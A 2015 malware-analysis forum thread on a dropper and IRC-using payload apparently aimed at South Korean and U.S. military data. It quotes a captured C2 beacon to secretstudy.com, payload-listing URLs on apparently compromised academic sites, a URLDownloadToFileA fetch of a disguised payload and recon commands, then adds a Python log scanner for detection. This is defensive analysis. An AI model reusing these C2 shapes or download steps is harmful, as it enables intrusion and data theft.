A forum for reverse engineering, OS internals and malware analysis 

 #26654  by R136a1
 Thu Sep 03, 2015 2:39 pm
Hi folks,

attached are samples of a malware with alleged purpose to steal sensitive information from South Korea / U.S. military.

Abstract of strings:
Code:
Military
military
MILITARY
weapon
Weapon
WEAPON
battle
Battle
BATTLE
munition
missile
Missile
MISSILE
Aircraft
Figther
Resolve
resolve
Operation
operation
OPERATION
Air Force
AirForce
airforce
AF Portal
AFPortal
EMAIL
AIRFORCE
AIR FORCE
email
KORCOM
CENTRIX
KR/FE
Intranet
intranet
TNOSC
COMSEC
PACCOM
PENTAGON
cassifi
securet
CASSIFI
Cassifi
Certificat
CERTIFICAT
Pentagon
pentagon
Samples:
https://www.virustotal.com/en/file/1f04 ... /analysis/ (Dropper)
https://www.virustotal.com/en/file/2d8b ... /analysis/ (Dropper)
https://www.virustotal.com/en/file/4df7 ... /analysis/ (Payload)
https://www.virustotal.com/en/file/020c ... /analysis/ (Payload)
Attachments
PW: infected
 #26655  by Xylitol
 Thu Sep 03, 2015 5:13 pm
g:\mail\pc-util\back\backdoor1\Release\BsDll.pdb
g:\작전준비\Tong\백도어\17th_Backdoor\BsDll-up\Release\BsDll.pdb

Some references to BsDll:
https://blogs.mcafee.com/mcafee-labs/di ... uth-korea/
https://www.blackhat.com/docs/asia-14/m ... Beyond.pdf
 #26657  by Xylitol
 Thu Sep 03, 2015 6:52 pm
The dropper has a commercial packer layer; overall, it injects mfc80u.dll into spoolsv.exe with the hostile code from the dropper's 'exe' resource and then self-deletes with a lame .bat.
Strings from the payload: it seems to use the IRC protocol and is also interested in AhnLab, ViRobot, ESTsoft and PhysicalDrive0.
Haven't looked further.

From a cuckoo run:
Code:
GET /bbs/install1_ok.php?no=0&id=v^086C1F25&sn=1406747&sc=5fb84e8bec4d5565b4be6dd0b73c1f0a HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: www.secretstudy.com
Connection: Keep-Alive
It creates a sysinfo.log file containing the output of
Code:
date
time
ipconfig /all
netstat -an
It also creates a password-protected archive containing information about the endpoint.
Second payload, URL gathering:
Code:
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://www.knuegerman.net/bbs/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://inmac3.snu.ac.kr/bbs/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://ymath.yonsei.ac.kr/bbs/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://www.objectworld.org/zboard/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://dblab.skku.ac.kr/bbs/list_all_ok.php"
URLDownloadToFileA > http://www.jejuhawaii.co.kr/zb41/images/inst_step11.gif
Url proc:
• dns: 1 ›› ip: 174.36.107.130 - adress: SECRETSTUDY.COM
• dns: 0 ›› ip: - adress: KNUEGERMAN.NET
• dns: 1 ›› ip: 147.46.66.129 - adress: INMAC3.SNU.AC.KR
• dns: 1 ›› ip: 165.132.220.45 - adress: YMATH.YONSEI.AC.KR
• dns: 1 ›› ip: 222.122.84.45 - adress: OBJECTWORLD.ORG
• dns: 1 ›› ip: 115.145.174.171 - adress: DBLAB.SKKU.AC.KR
• dns: 1 ›› ip: 124.217.198.253 - adress: JEJUHAWAII.CO.KR
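A defender-side example added here, not code from either poster: a small Python scanner that flags proxy-log entries matching the C2 URL shapes quoted in this thread, namely the install1_ok.php beacon with its no/id/sn/sc query parameters (sc being a 32-hex-character value) and the list_all_ok.php listing URLs pulled out of the second payload. The tab-separated log format and the benign lines are constructed for the example; the matching lines reuse the URLs quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# URL shapes observed in this thread: the beacon from the cuckoo run and the
# listing URLs hard-coded in the second payload. Path patterns only, so the
# check does not depend on the (disposable) host names.
BEACON_PATH = re.compile(r"/bbs/install1_ok\.php$")
LISTING_PATH = re.compile(r"/(?:bbs|zboard)/list_all_ok\.php$")
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed proxy log: "<timestamp>\t<client>\t<method>\t<url>". Lines 1 and 2
# reuse URLs quoted in the thread; lines 3 and 4 are benign look-alikes.
SAMPLE_LOG = [
    "2015-09-03T14:39:01Z\t10.0.0.5\tGET\thttp://www.secretstudy.com/bbs/install1_ok.php"
    "?no=0&id=v^086C1F25&sn=1406747&sc=5fb84e8bec4d5565b4be6dd0b73c1f0a",
    "2015-09-03T14:39:07Z\t10.0.0.5\tGET\thttp://dblab.skku.ac.kr/bbs/list_all_ok.php",
    "2015-09-03T14:40:12Z\t10.0.0.9\tGET\thttp://www.example.com/bbs/list.php?page=2",
    "2015-09-03T14:40:30Z\t10.0.0.9\tGET\thttp://www.example.com/index.html",
]


def classify_request(url):
    """Return the list of reasons the URL matches the observed C2 shapes ([] if none)."""
    parts = urlsplit(url)
    reasons = []
    if BEACON_PATH.search(parts.path):
        qs = parse_qs(parts.query)
        # The beacon carried exactly these four parameters; require all of them
        # so an unrelated install1_ok.php page does not fire on path alone.
        if {"no", "id", "sn", "sc"} <= set(qs):
            reasons.append("install1_ok.php beacon with no/id/sn/sc parameters")
            if HEX32.match(qs["sc"][0]):
                reasons.append("sc parameter is 32 hex chars")
    if LISTING_PATH.search(parts.path):
        reasons.append("list_all_ok.php URL used by the second payload")
    return reasons


def scan_log(lines):
    """Yield (line_number, url, reasons) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = line.split("\t")
        if len(fields) != 4:
            continue  # malformed line; skip rather than crash the scan
        url = fields[3]
        reasons = classify_request(url)
        if reasons:
            hits.append((number, url, reasons))
    return hits


if __name__ == "__main__":
    for number, url, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number}: {url}")
        for reason in reasons:
            print(f"    - {reason}")
```

The host-independent path match is deliberate: the thread shows the same `list_all_ok.php` endpoint hosted on several compromised university and hobby sites, so alerting on the path and parameter shape survives the operators moving to a new host, whereas a host list would not.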